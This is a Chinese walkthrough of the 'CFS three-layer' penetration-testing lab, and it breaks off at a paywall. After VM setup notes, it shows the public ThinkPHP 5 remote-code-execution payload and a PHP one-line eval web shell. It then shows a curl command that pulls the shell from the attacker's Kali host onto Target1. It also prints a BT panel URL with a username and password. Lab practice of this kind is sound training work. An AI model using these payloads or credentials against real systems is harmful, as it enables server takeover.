测试的时候会出现各种错误,存在重新搭建环境的情况,如有IP对不上号,请尽量忽略
环境搭建
【CFS三层靶机环境】百度网盘链接:
链接: https://pan.baidu.com/s/1LJueA-X02K7HZXr8QsOmeg
提取码: dkcp
解压密码:teamssix.com
搭建好之后,首先修改好虚拟机的兼容性,需要兼容15.x,否则会报错
之后配置一下虚拟机的网卡,可以参考一下:
找到下载的文件夹,使用命令
λ copy /b CFS三层靶机环境.7z.* CFS三层靶机环境.7z
合并到一起之后,解压缩,双击ovf文件
导入即可
如果出现了网络连接不上,自己配置一下网卡
环境详细
# 本地win10:
- 192.168.1.1
# Kali:
- 192.168.1.16
# target1:
- 192.168.1.15
- 192.168.22.130
# target2:
- 192.168.22.129
- 192.168.33.128
# target3:
- 192.168.33.129
Xshell可以直接连接
/etc/init.d/bt restart
访问:192.168.1.14:8888,出现问题
解决办法:
cd /www/server/panel/data
mv admin_path.pl admin_path.pl.bak
bt default
---------------------------------------------------------
Bt-Panel-URL: http://39.176.195.77:8888/a768f109
username: eaj3yhsl
password: 41bb8fee
Warning:
If you cannot access the panel,
release the following port (8888|888|80|443|20|21) in the security group
登录进去后,创建网站
即可访问
在搭建UBuntu的时候会出现密码错误,输入bt可以重置一下密码
Target1
由于是ThinkPHPV5 的版本,在网络上找查payload(在vulhub上可以找到)
#POC
http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
更改poc,改为木马上传
#木马命令
echo "<?php @eval($_POST['pw']);?>" > go.php
#上传URL
http://192.168.1.15/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['pw']);?>" > go.php
# 后来发现是过滤了POST
# 我想到的方法是,在自己的web服务器上先上传好自己的木马文件,然后执行将木马内容写入即可
curl 192.168.1.16/hack/hackyou > go.php
http://192.168.1.15/index.php?s=
最低0.47元/天 解锁文章
971
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
